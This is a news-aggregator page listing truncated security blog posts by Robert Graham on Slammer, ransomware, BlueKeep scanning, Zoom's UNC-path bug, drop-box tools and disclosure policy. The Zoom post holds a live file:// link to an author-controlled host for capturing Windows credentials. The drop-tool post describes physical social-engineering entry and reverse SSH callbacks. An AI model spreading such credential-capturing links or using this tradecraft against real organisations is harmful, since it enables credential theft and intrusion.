What's new arround internet

Last one

Src Date (GMT) Titre Description Tags Stories Notes
ErrataRob.webp 2023-01-25 16:09:34 I\'m still bitter about Slammer (lien direct) Today is the 20th anniversary of the Slammer worm. I'm still angry over it, so I thought I'd write up my anger. This post will be of interest to nobody, it's just me venting my bitterness and get off my lawn!!Back in the day, I wrote "BlackICE", an intrusion detection and prevention system that ran as both a desktop version and a network appliance. Most cybersec people from that time remember it as the desktop version, but the bulk of our sales came from the network appliance.The network appliance competed against other IDSs at the time, such as Snort, an open-source product. For much the cybersec industry, IDS was Snort -- they had no knowledge of how intrusion-detection would work other than this product, because it was open-source.My intrusion-detection technology was radically different. The thing that makes me angry is that I couldn't explain the differences to the community because they weren't technical enough.When Slammer hit, Snort and Snort-like products failed. Mine succeeded extremely well. Yet, I didn't get the credit for this.The first difference is that I used a custom poll-mode driver instead of interrupts. This the now the norm in the industry, such as with Linux NAPI drivers. The problem with interrupts is that a computer could handle less than 50,000 interrupts-per-second. If network traffic arrived faster than this, then the computer would hang, spending all it's time in the interrupt handler doing no other useful work. By turning off interrupts and instead polling for packets, this problem is prevented. The cost is that if the computer isn't heavily loaded by network traffic, then polling causes wasted CPU and electrical power. Linux NAPI drivers switch between them, interrupts when traffic is light and polling when traffic is heavy.The consequence is that a typical machine of the time (dual Pentium IIIs) could handle 2-million packets-per-second running my software, far better than the 50,000 packets-per-second of the competitors.When Slammer hit, it filled a 1-gbps Ethernet with 300,000 packets-per-second. As a consequence, pretty much all other IDS products fell over. Those that survived were attached to slower links -- 100-mbps was still common at the time.An industry luminary even gave a presentation at BlackHat saying that my claimed performance (2-million packets-per-second) was impossible, because everyone knew that computers couldn't handle traffic that fast. I couldn't combat that, even by explaining with very small words "but we disable interrupts".Now this is the norm. All network drivers are written with polling in mind. Specialized drivers like PF_RING and DPDK do even better. Networks appliances are now written using these things. Now you'd expect something like Snort to keep up and not get overloaded with interrupts. What makes me bitter is that back then, this was inexplicable magic.I wrote an article in PoC||GTFO 0x15 that shows how my portscanner masscan uses this driver, if you want more info.The second difference with my product was how signatures were written. Everyone else used signatures that triggered on the pattern-matching. Instead, my technology included protocol-analysis, code that parsed more than 100 protocols.The difference is that when there is an exploit of a buffer-overflow vulnerability, pattern-matching searched for patterns unique to the exploit. In my case, we'd measure the length of the buffer, triggering when it exceeded a certain length, finding any attempt to attack the vulnerability.The reason we could do this was through the use of state-machine parsers. Such analysis was considered heavy-weight and slow, which is why others avoided it. State-machines are faster than pattern-matching, many times faster. Better and faster.Such parsers are no Vulnerability Guideline ★★
ErrataRob.webp 2021-07-14 20:49:05 Ransomware: Quis custodiet ipsos custodes (lien direct) Many claim that "ransomware" is due to cybersecurity failures. It's not really true. We are adequately protecting users and computers. The failure is in the inability of cybersecurity guardians to protect themselves. Ransomware doesn't make the news when it only accesses the files normal users have access to. The big ransomware news events happened because ransomware elevated itself to that of an "administrator" over the network, giving it access to all files, including online backups.Generic improvements in cybersecurity will help only a little, because they don't specifically address this problem. Likewise, blaming ransomware on how it breached perimeter defenses (phishing, patches, password reuse) will only produce marginal improvements. Ransomware solutions need to instead focus on looking at the typical human-operated ransomware killchain, identify how they typically achieve "administrator" credentials, and fix those problems. In particular, large organizations need to redesign how they handle Windows "domains" and "segment" networks.I read a lot of lazy op-eds on ransomware. Most of them claim that the problem is due to some sort of moral weakness (laziness, stupidity, greed, slovenliness, lust). They suggest things like "taking cybersecurity more seriously" or "do better at basic cyber hygiene". These are "unfalsifiable" -- things that nobody would disagree with, meaning they are things the speaker doesn't really have to defend. They don't rest upon technical authority but moral authority: anybody, regardless of technical qualifications, can have an opinion on ransomware as long as they phrase it in such terms.Another flaw of these "unfalsifiable" solutions is that they are not measurable. There's no standard definition for "best practices" or "basic cyber hygiene", so there no way to tell if you aren't already doing such things, or the gap you need to overcome to reach this standard. Worse, some people point to the "NIST Cybersecurity Framework" as the "basics" -- but that's a framework for all cybersecurity practices. In other words, anything short of doing everything possible is considered a failure to follow the basics.In this post, I try to focus on specifics, while at the same time, making sure things are broadly applicable. It's detailed enough that people will disagree with my solutions.The thesis of this blogpost is that we are failing to protect "administrative" accounts. The big ransomware attacks happen because the hackers got administrative control over the network, usually the Windows domain admin. It's with administrative control that they are able to cause such devastation, able to reach all the files in the network, while also being able to delete backups.The Kaseya attacks highlight this particularly well. The company produces a product that is in turn used by "Managed Security Providers" (MSPs) to administer the security of small and medium sized businesses. Hackers found and exploited a vulnerability in the product, which gave them administrative control of over 1000 small and medium sized businesses around the world.The underlying problems start with the way their software gives indiscriminate administrative access over computers. Then, this software was written using standard software techniques, meaning, with the standard vulnerabilities that most software has (such as "SQL injection"). It wasn't written in a paranoid, careful way that you'd hope for software that poses this much danger.A good analogy is airplanes. A common joke refers to the "black box" flight-recorders that survive airplane crashes, that maybe we should make the entire airplane out of that material. The reason we can't do this is that airplanes would be too heavy to fly. The same is true of software: airplane software is written with extreme paranoia knowing that bugs can l Ransomware Vulnerability Guideline
ErrataRob.webp 2021-04-21 17:27:21 Ethics: University of Minnesota\'s hostile patches (lien direct) The University of Minnesota (UMN) got into trouble this week for doing a study where they have submitted deliberately vulnerable patches into open-source projects, in order to test whether hostile actors can do this to hack things. After a UMN researcher submitted a crappy patch to the Linux Kernel, kernel maintainers decided to rip out all recent UMN patches.Both things can be true:Their study was an important contribution to the field of cybersecurity.Their study was unethical.It's like Nazi medical research on victims in concentration camps, or U.S. military research on unwitting soldiers. The research can simultaneously be wildly unethical but at the same time produce useful knowledge.I'd agree that their paper is useful. I would not be able to immediately recognize their patches as adding a vulnerability -- and I'm an expert at such things.In addition, the sorts of bugs it exploits shows a way forward in the evolution of programming languages. It's not clear that a "safe" language like Rust would be the answer. Linux kernel programming requires tracking resources in ways that Rust would consider inherently "unsafe". Instead, the C language needs to evolve with better safety features and better static analysis. Specifically, we need to be able to annotate the parameters and return statements from functions. For example, if a pointer can't be NULL, then it needs to be documented as a non-nullable pointer. (Imagine if pointers could be signed and unsigned, meaning, can sometimes be NULL or never be NULL).So I'm glad this paper exists. As a researcher, I'll likely cite it in the future. As a programmer, I'll be more vigilant in the future. In my own open-source projects, I should probably review some previous pull requests that I've accepted, since many of them have been the same crappy quality of simply adding a (probably) unnecessary NULL-pointer check.The next question is whether this is ethical. Well, the paper claims to have sign-off from their university's IRB -- their Institutional Review Board that reviews the ethics of experiments. Universities created IRBs to deal with the fact that many medical experiments were done on either unwilling or unwitting subjects, such as the Tuskegee Syphilis Study. All medical research must have IRB sign-off these days.However, I think IRB sign-off for computer security research is stupid. Things like masscanning of the entire Internet are undecidable with traditional ethics. I regularly scan every device on the IPv4 Internet, including your own home router. If you paid attention to the packets your firewall drops, some of them would be from me. Some consider this a gross violation of basic ethics and get very upset that I'm scanning their computer. Others consider this to be the expected consequence of the end-to-end nature of the public Internet, that there's an inherent social contract that you must be prepared to receive any packet from anywhere. Kerckhoff's Principle from the 1800s suggests that core ethic of cybersecurity is exposure to such things rather than trying to cover them up.The point isn't to argue whether masscanning is ethical. The point is to argue that it's undecided, and that your IRB isn't going to be able to answer the question better than anybody else.But here's the thing about masscanning: I'm honest and transparent about it. My very first scan of the entire Internet came with a tweet "BTW, this is me scanning the entire Internet".A lot of ethical questions in other fields comes down to honesty. If you have to lie about it or cover it up, then th Hack Vulnerability
ErrataRob.webp 2020-05-19 18:03:23 Securing work-at-home apps (lien direct) In today's post, I answer the following question:Our customer's employees are now using our corporate application while working from home. They are concerned about security, protecting their trade secrets. What security feature can we add for these customers?The tl;dr answer is this: don't add gimmicky features, but instead, take this opportunity to do security things you should already be doing, starting with a "vulnerability disclosure program" or "vuln program".GimmicksFirst of all, I'd like to discourage you from adding security gimmicks to your product. You are no more likely to come up with an exciting new security feature on your own as you are a miracle cure for the covid. Your sales and marketing people may get excited about the feature, and they may get the customer excited about it too, but the excitement won't last.Eventually, the customer's IT and cybersecurity teams will be brought in. They'll quickly identify your gimmick as snake oil, and you'll have made an enemy of them. They are already involved in securing the server side, the work-at-home desktop, the VPN, and all the other network essentials. You don't want them as your enemy, you want them as your friend. You don't want to send your salesperson into the maw of a technical meeting at the customer's site trying to defend the gimmick.You want to take the opposite approach: do something that the decision maker on the customer side won't necessarily understand, but which their IT/cybersecurity people will get excited about. You want them in the background as your champion rather than as your opposition.Vulnerability disclosure programTo accomplish this goal described above, the thing you want is known as a vulnerability disclosure program. If there's one thing that the entire cybersecurity industry is agreed about (other than hating the term cybersecurity, preferring "infosec" instead) is that you need this vulnerability disclosure program. Everything else you might want to do to add security features in your product come after you have this thing.Your product has security bugs, known as vulnerabilities. This is true of everyone, no matter how good you are. Apple, Microsoft, and Google employ the brightest minds in cybersecurity and they have vulnerabilities. Every month you update their products with the latest fixes for these vulnerabilities. I just bought a new MacBook Air and it's already telling me I need to update the operating system to fix the bugs found after it shipped.These bugs come mostly from outsiders. These companies have internal people searching for such bugs, as well as consultants, and do a good job quietly fixing what they find. But this goes only so far. Outsiders have a wider set of skills and perspectives than the companies could ever hope to control themselves, so find things that the companies miss.These outsiders are often not customers.This has been a chronic problem throughout the history of computers. Somebody calls up your support line and tells you there's an obvious bug that hackers can easily exploit. The customer support representative then ignores this because they aren't a customer. It's foolish wasting time adding features to a product that no customer is asking for.But then this bug leaks out to the public, hackers widely exploit it damaging customers, and angry customers now demand why you did nothing to fix the bug despite having been notified about it.The problem here is that nobody has the job of responding to such problems. The reason your company dropped the ball was that nobody was assigned to pick it up. All a vulnerability disclosure program means that at least one person within the company has the responsibility of dealing with it.How to set up vulnerability disclosure program Spam Vulnerability Threat Guideline ★★★
ErrataRob.webp 2020-04-02 01:23:55 About them Zoom vulns... (lien direct) Today a couple vulnerabilities were announced in Zoom, the popular work-from-home conferencing app. Hackers can possibly exploit these to do evil things to you, such as steal your password. Because of the COVID-19, these vulns have hit the mainstream media. This means my non-techy friends and relatives have been asking about it. I thought I'd write up a blogpost answering their questions.The short answer is that you don't need to worry about it. Unless you do bad things, like using the same password everywhere, it's unlikely to affect you. You should worry more about wearing pants on your Zoom video conferences in case you forget and stand up.Now is a good time to remind people to stop using the same password everywhere and to visit https://haveibeenpwned.com to view all the accounts where they've had their password stolen. Using the same password everywhere is the #1 vulnerability the average person is exposed to, and is a possible problem here. For critical accounts (Windows login, bank, email), use a different password for each. (Sure, for accounts you don't care about, use the same password everywhere, I use 'Foobar1234'). Write these passwords down on paper and put that paper in a secure location. Don't print them, don't store them in a file on  your computer. Writing it on a Post-It note taped under your keyboard is adequate security if you trust everyone in your household.If hackers use this Zoom method to steal your Windows password, then you aren't in much danger. They can't log into your computer because it's almost certainly behind a firewall. And they can't use the password on your other accounts, because it's not the same.Why you shouldn't worryThe reason you shouldn't worry about this password stealing problem is because it's everywhere, not just Zoom. It's also here in this browser you are using. If you click on file://hackme.robertgraham.com/foo/bar.html, then I can grab your password in exactly the same way as if you clicked on that vulnerable link in Zoom chat. That's how the Zoom bug works: hackers post these evil links in the chat window during a Zoom conference.It's hard to say Zoom has a vulnerability when so many other applications have the same issue.Many home ISPs block such connections to the Internet, such as Comcast, AT&TCox, Verizon Wireless, and others. If this is the case, when you click on the above link, nothing will happen. Your computer till try to contact hackme.robertgraham.com, and fail. You may be protected from clicking on the above link without doing anything. If your ISP doesn't block such connections, you can configure your home router to do this. Go into the firewall settings and block "TCP port 445 outbound". Alternatively, you can configure Windows to only follow such links internal to your home network, but not to the Internet.If hackers (like me if you click on the above link) gets your password, then they probably can't use use it. That's because while your home Internet router allows outbound connections, it (almost always) blocks inbound connections. Thus, if I steal your Windows password, I can't use it to log into your home computer unless I also break physically into your house. But if I can break into your computer physically, I can hack it without knowing your password.The same arguments apply to corporate desktops. Corporations should block such outbound connections. They Hack Vulnerability Threat
ErrataRob.webp 2019-05-29 20:16:09 Your threat model is wrong (lien direct) Several subjects have come up with the past week that all come down to the same thing: your threat model is wrong. Instead of addressing the the threat that exists, you've morphed the threat into something else that you'd rather deal with, or which is easier to understand.PhishingAn example is this question that misunderstands the threat of "phishing":Should failing multiple phishing tests be grounds for firing? I ran into a guy at a recent conference, said his employer fired people for repeatedly falling for (simulated) phishing attacks. I talked to experts, who weren't wild about this disincentive. https://t.co/eRYPZ9qkzB pic.twitter.com/Q1aqCmkrWL- briankrebs (@briankrebs) May 29, 2019The (wrong) threat model is here is that phishing is an email that smart users with training can identify and avoid. This isn't true.Good phishing messages are indistinguishable from legitimate messages. Said another way, a lot of legitimate messages are in fact phishing messages, such as when HR sends out a message saying "log into this website with your organization username/password".Recently, my university sent me an email for mandatory Title IX training, not digitally signed, with an external link to the training, that requested my university login creds for access, that was sent from an external address but from the Title IX coordinator.- Tyler Pieron (@tyler_pieron) May 29, 2019Yes, it's amazing how easily stupid employees are tricked by the most obvious of phishing messages, and you want to point and laugh at them. But frankly, you want the idiot employees doing this. The more obvious phishing attempts are the least harmful and a good test of the rest of your security -- which should be based on the assumption that users will frequently fall for phishing.In other words, if you paid attention to the threat model, you'd be mitigating the threat in other ways and not even bother training employees. You'd be firing HR idiots for phishing employees, not punishing employees for getting tricked. Your systems would be resilient against successful phishes, such as using two-factor authentication.IoT securityAfter the Mirai worm, government types pushed for laws to secure IoT devices, as billions of insecure devices like TVs, cars, security cameras, and toasters are added to the Internet. Everyone is afraid of the next Mirai-type worm. For example, they are pushing for devices to be auto-updated.But auto-updates are a bigger threat than worms.Since Mirai, roughly 10-billion new IoT devices have been added to the Internet, yet there hasn't been a Mirai-sized worm. Why is that? After 10-billion new IoT devices, it's still Windows and not IoT that is the main problem.The answer is that number, 10-billion. Internet worms work by guessing IPv4 addresses, of which there are only 4-billion. You can't have 10-billion new devices on the public IPv4 addresses because there simply aren't enough addresses. Instead, those 10-billion devices are almost entirely being put on private ne Ransomware Tool Vulnerability Threat Guideline FedEx NotPetya
ErrataRob.webp 2019-05-28 06:20:06 Almost One Million Vulnerable to BlueKeep Vuln (CVE-2019-0708) (lien direct) Microsoft announced a vulnerability in it's "Remote Desktop" product that can lead to robust, wormable exploits. I scanned the Internet to assess the danger. I find nearly 1-million devices on the public Internet that are vulnerable to the bug. That means when the worm hits, it'll likely compromise those million devices. This will likely lead to an event as damaging as WannaCry and notPetya from 2017 -- potentially worse, as hackers have since honed their skills exploiting these things for ransomware and other nastiness.To scan the Internet, I started with masscan, my Internet-scale port scanner, looking for port 3389, the one used by Remote Desktop. This takes a couple hours, and lists all the devices running Remote Desktop -- in theory.This returned 7,629,102 results (over 7-million). However, there is a lot of junk out there that'll respond on this port. Only about half are actually Remote Desktop.Masscan only finds the open ports, but is not complex enough to check for the vulnerability. Remote Desktop is a complicated protocol. A project was posted that could connect to an address and test it, to see if it was patched or vulnerable. I took that project and optimized it a bit, rdpscan, then used it to scan the results from masscan. It's a thousand times slower, but it's only scanning the results from masscan instead of the entire Internet.The table of results is as follows:1447579  UNKNOWN - receive timeout1414793  SAFE - Target appears patched1294719  UNKNOWN - connection reset by peer1235448  SAFE - CredSSP/NLA required 923671  VULNERABLE -- got appid 651545  UNKNOWN - FIN received 438480  UNKNOWN - connect timeout 105721  UNKNOWN - connect failed 9  82836  SAFE - not RDP but HTTP  24833  UNKNOWN - connection reset on connect   3098  UNKNOWN - network error   2576  UNKNOWN - connection terminatedThe various UNKNOWN things fail for various reasons. A lot of them are because the protocol isn't actually Remote Desktop and respond weirdly when we try to talk Remote Desktop. A lot of others are Windows machines, sometimes vulnerable and sometimes not, but for some reason return errors sometimes.The important results are those marked VULNERABLE. There are 923,671 vulnerable machines in this result. That means we've confirmed the vulnerability really does exist, though it's possible a small number of these are "honeypots" deliberately pretending to be vulnerable in order to monitor hacker activity on the Internet.The next result are those marked SAFE due to probably being "pached". Actually, it doesn't necessarily mean they are patched Windows boxes. They could instead be non-Windows systems that appear the same as patched Windows boxes. But either way, they are safe from this vulnerability. There are 1,414,793 of them.The next result to look at are those marked SAFE due to CredSSP/NLA failures, of which there are 1,235,448. This doesn't mean they are patched, but only that we can't exploit them. They require "network level authentication" first before we can talk Remote Desktop to them. That means we can't test whether they are patched or vulnerable -- but neither can the hackers. They may still be exploitable via an insider threat who knows a valid username/password, but they aren't exploitable by anonymous hackers or worms.The next category is marked as SAFE because they aren't Remote Desktop at all, but HTTP servers. In other words, in response to o Ransomware Vulnerability Threat Patching Guideline NotPetya Wannacry
ErrataRob.webp 2018-12-11 22:59:55 Notes about hacking with drop tools (lien direct) In this report, Kasperky found Eastern European banks hacked with Raspberry Pis and "Bash Bunnies" (DarkVishnya). I thought I'd write up some more detailed notes on this.Drop toolsA common hacking/pen-testing technique is to drop a box physically on the local network. On this blog, there are articles going back 10 years discussing this. In the old days, this was done with $200 "netbook" (cheap notebook computers). These days, it can be done with $50 "Raspberry Pi" computers, or even $25 consumer devices reflashed with Linux.A "Raspberry Pi" is a $35 single board computer, for which you'll need to add about another $15 worth of stuff to get it running (power supply, flash drive, and cables). These are extremely popular hobbyist computers that are used everywhere from home servers, robotics, and hacking. They have spawned a large number of clones, like the ODROID, Orange Pi, NanoPi, and so on. With a quad-core, 1.4 GHz, single-issue processor, 2 gigs of RAM, and typically at least 8 gigs of flash, these are pretty powerful computers.Typically what you'd do is install Kali Linux. This is a Linux "distro" that contains all the tools hackers want to use.You then drop this box physically on the victim's network. We often called these "dropboxes" in the past, but now that there's a cloud service called "Dropbox", this becomes confusing, so I guess we can call them "drop tools". The advantage of using something like a Raspberry Pi is that it's cheap: once dropped on a victim's network, you probably won't ever get it back again.Gaining physical access to even secure banks isn't that hard. Sure, getting to the money is tightly controlled, but other parts of the bank aren't not nearly as secure. One good trick is to pretend to be a banking inspector. At least in the United States, they'll quickly bend over an spread them if they think you are a regulator. Or, you can pretend to be maintenance worker there to fix the plumbing. All it takes is a uniform with a logo and what appears to be a valid work order. If questioned, whip out the clipboard and ask them to sign off on the work. Or, if all else fails, just walk in brazenly as if you belong.Once inside the physical network, you need to find a place to plug something in. Ethernet and power plugs are often underneath/behind furniture, so that's not hard. You might find access to a wiring closet somewhere, as Aaron Swartz famously did. You'll usually have to connect via Ethernet, as it requires no authentication/authorization. If you could connect via WiFi, you could probably do it outside the building using directional antennas without going through all this.Now that you've got your evil box installed, there is the question of how you remotely access it. It's almost certainly firewalled, preventing any inbound connection.One choice is to configure it for outbound connections. When doing pentests, I configure reverse SSH command-prompts to a command-and-control server. Another alternative is to create a SSH Tor hidden service. There are a myriad of other ways you might do this. They all suffer the problem that anybody looking at the organization's outbound traffic can notice these connections.Another alternative is to use the WiFi. This allows you to physically sit outside in the parking lot and connect to the box. This can sometimes be detected using WiFi intrusion prevention systems, though it's not hard to get around that. The downside is that it puts you in some physical jeopardy, because you have to be physically near the building. However, you can mitigate this in some cases, such as sticking a second Raspberry Pi in a nearby bar that is close enough to connection, and then use the bar's Internet connection to hop-scotch on in. Vulnerability
ErrataRob.webp 2018-11-04 18:22:46 Brian Kemp is bad on cybersecurity (lien direct) I'd prefer a Republican governor, but as a cybersecurity expert, I have to point out how bad Brian Kemp (candidate for Georgia governor) is on cybersecurity. When notified about vulnerabilities in election systems, his response has been to shoot the messenger rather than fix the vulnerabilities. This was the premise behind the cybercrime bill earlier this year that was ultimately vetoed by the current governor after vocal opposition from cybersecurity companies. More recently, he just announced that he's investigating the Georgia State Democratic Party for a "failed hacking attempt".According to news stories, state elections websites are full of common vulnerabilities, those documented by the OWASP Top 10, such as "direct object references" that would allow any election registration information to be read or changed, as allowing a hacker to cancel registrations of those of the other party.Testing for such weaknesses is not a crime. Indeed, it's desirable that people can test for security weaknesses. Systems that aren't open to test are insecure. This concept is the basis for many policy initiatives at the federal level, to not only protect researchers probing for weaknesses from prosecution, but to even provide bounties encouraging them to do so. The DoD has a "Hack the Pentagon" initiative encouraging exactly this.But the State of Georgia is stereotypically backwards and thuggish. Earlier this year, the legislature passed SB 315 that criminalized this activity of merely attempting to access a computer without permission, to probe for possibly vulnerabilities. To the ignorant and backwards person, this seems reasonable, of course this bad activity should be outlawed. But as we in the cybersecurity community have learned over the last decades, this only outlaws your friends from finding security vulnerabilities, and does nothing to discourage your enemies. Russian election meddling hackers are not deterred by such laws, only Georgia residents concerned whether their government websites are secure.It's your own users, and well-meaning security researchers, who are the primary source for improving security. Unless you live under a rock (like Brian Kemp, apparently), you'll have noticed that every month you have your Windows desktop or iPhone nagging you about updating the software to fix security issues. If you look behind the scenes, you'll find that most of these security fixes come from outsiders. They come from technical experts who accidentally come across vulnerabilities. They come from security researchers who specifically look for vulnerabilities.It's because of this "research" that systems are mostly secure today. A few days ago was the 30th anniversary of the "Morris Worm" that took down the nascent Internet in 1988. The net of that time was hostile to security research, with major companies ignoring vulnerabilities. Systems then were laughably insecure, but vendors tried to address the problem by suppressing research. The Morris Worm exploited several vulnerabilities that were well-known at the time, but ignored by the vendor (in this case, primarily Sun Microsystems).Since then, with a culture of outsiders disclosing vulnerabilities, vendors have been pressured into fix them. This has led to vast improvements in security. I'm posting this from a public WiFi hotspot in a bar, for example, because computers are secure enough for this to be safe. 10 years ago, such activity wasn't safe.The Georgia Democrats obviously have concerns about the integrity of election systems. They have every reason to thoroughly probe an elections website looking for vulnerabilities. This sort of activity should be encouraged, not supp Vulnerability Threat Guideline
Last update at: 2024-05-02 14:07:57
See our sources.
My email:

To see everything: Our RSS (filtrered) Twitter